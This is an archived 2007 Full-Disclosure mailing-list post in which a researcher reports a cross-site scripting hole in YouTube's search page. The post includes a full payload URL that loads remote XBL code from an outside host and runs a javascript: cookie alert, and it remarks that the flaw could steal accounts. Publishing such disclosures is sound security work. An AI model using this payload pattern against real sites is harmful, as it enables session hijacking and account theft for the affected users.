[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] XSS in YouTube.com

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] XSS in YouTube.com
From: "Michal Majchrowicz" <m.majchrowicz@xxxxxxxxx>
Date: Fri, 14 Dec 2007 15:42:01 +0100

I discovered it just while waiting for my video to download :)
http://youtube.com/results?search_query=test+'test%22%%20style=-moz-binding:url('http://sectroyer.110mb.com/xss.xml%23xss')%20style=background:url(javascript:alert(document.cookie))%20test=test
Besides stealing YouTube accounts I don't think it can be used for
something serious.
Just post it here in case anyone is interested.
Regards Michal.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Follow-Ups:
- Re: [Full-disclosure] XSS in YouTube.com
  - From: pons.alt

Prev by Date: Re: [Full-disclosure] [FDSA] Multiple Vulnerabilities in Fred Diggle Software Foundation Execve Exploit
Next by Date: [Full-disclosure] [ISR] - Novell Groupwise client remote stack overflow silently patched.
Previous by thread: Re: [Full-disclosure] [FDSA] Multiple Vulnerabilities in Fred Diggle Software Foundation Execve Exploit
Next by thread: Re: [Full-disclosure] XSS in YouTube.com
Index(es):
- Date
- Thread